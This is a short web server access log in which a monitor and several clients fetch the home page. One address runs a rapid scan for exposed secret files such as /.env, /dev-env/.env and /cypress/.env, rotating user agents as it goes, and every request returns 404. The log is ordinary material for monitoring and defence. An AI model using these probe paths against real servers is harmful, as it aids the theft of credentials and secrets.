212.91.247.32 - - [02/Jul/2025:19:47:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.3.221.137 - - [02/Jul/2025:19:48:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0"
212.91.247.32 - - [02/Jul/2025:19:48:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.247.32 - - [02/Jul/2025:19:49:54 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.130.96.91 - - [02/Jul/2025:19:50:00 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
3.130.96.91 - - [02/Jul/2025:19:50:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
78.153.140.224 - - [02/Jul/2025:19:50:40 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36"
78.153.140.224 - - [02/Jul/2025:19:50:40 +0200] "\x16\x03\x01" 501 318 "-" "-"
78.153.140.224 - - [02/Jul/2025:19:50:41 +0200] "GET /env.template HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; CMDTDFJS; GWX:MANAGED)"
78.153.140.224 - - [02/Jul/2025:19:50:41 +0200] "GET /env/test.ini HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.8) Gecko/20100318 Gentoo Firefox/3.5.8"
78.153.140.224 - - [02/Jul/2025:19:50:41 +0200] "GET /dev-env/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 OPR/47.0.2631.55"
78.153.140.224 - - [02/Jul/2025:19:50:42 +0200] "GET /helpers/.env HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; GTB7.5; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)"
78.153.140.224 - - [02/Jul/2025:19:50:42 +0200] "GET /data/env.txt HTTP/1.1" 404 317 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; MS-RTC LM 8)"
78.153.140.224 - - [02/Jul/2025:19:50:42 +0200] "GET /current/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Linux; U; Android 4.1.2; es-us; SGH-T999L Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30"
3.130.96.91 - - [02/Jul/2025:19:50:42 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36"
78.153.140.224 - - [02/Jul/2025:19:50:43 +0200] "GET /cypress/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.9.2.13) Gecko/20101209 Fedora/3.6.13-1.fc13 Firefox/3.6.13"
